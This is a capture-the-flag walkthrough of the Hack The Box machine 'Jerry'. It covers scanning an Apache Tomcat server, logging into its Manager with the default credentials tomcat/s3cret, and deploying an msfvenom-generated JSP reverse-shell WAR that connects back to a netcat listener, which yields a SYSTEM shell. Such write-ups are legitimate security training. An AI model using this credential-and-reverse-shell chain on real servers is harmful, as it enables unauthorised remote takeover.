Jerry

Reconnaissance:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.95

8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.95 

Not shown: 1000 open|filtered udp ports (no-response)

┌──(kali💀kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -t 30 -e -k -x .html,.php -u http://10.10.10.95:8080 

http://10.10.10.95:8080/aux                  (Status: 200) [Size: 0]
http://10.10.10.95:8080/com1                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/com2                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/com3                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/con                  (Status: 200) [Size: 0]
http://10.10.10.95:8080/docs                 (Status: 302) [Size: 0] [--> /docs/]
http://10.10.10.95:8080/examples             (Status: 302) [Size: 0] [--> /examples/]
http://10.10.10.95:8080/favicon.ico          (Status: 200) [Size: 21630]
http://10.10.10.95:8080/host-manager         (Status: 302) [Size: 0] [--> /host-manager/]
http://10.10.10.95:8080/lpt1                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/lpt2                 (Status: 200) [Size: 0]
http://10.10.10.95:8080/manager              (Status: 302) [Size: 0] [--> /manager/]
http://10.10.10.95:8080/nul                  (Status: 200) [Size: 0]

┌──(kali💀kali)-[~]
└─$ nikto -host 10.10.10.95:8080

+ Server: Apache-Coyote/1.1
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /favicon.ico: identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community. See: https://en.wikipedia.org/wiki/Favicon
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS .
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2104
+ /manager/html: Default account found for 'Tomcat Manager Application' at (ID 'tomcat', PW 's3cret'). Apache Tomcat. See: CWE-16
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found.
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected).

We have one port open.

Port 8080: running Apache Tomcat/Coyote JSP engine 1.1

Before we move on to enumeration, let’s make some mental notes about the scan results.

Port 8080 is running Apache Tomcat and the nmap scan found the /manager/html page, which is the login page to the Manager interface. The nikto scan identified that this page is using the default credentials tomcat/s3cret. Apache Tomcat by design allows you to run code, so we can simply deploy a war file that sends a reverse shell back to our attack machine.

Exploitation:

Visit the /manager/html page and log in with the credentials tomcat/s3cret.

http://10.10.10.95:8080/manager/html

Generate a war file that contains a reverse shell using msfvenom.

┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f war > shell.war

Upload the file on the Tomcat Application Manager and deploy it. Set up a listener on the target machine.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 1234

Click on the war file in the Tomcat Application Manager to execute our shell.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

We get a shell with SYSTEM privileges! That was easy! We don’t even have to escalate our privileges for this box.

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt
user.txt
7004-----------------------------

root.txt
04a8b3-----------------------------

PreviousBounty NextConceal

Last updated 1 year ago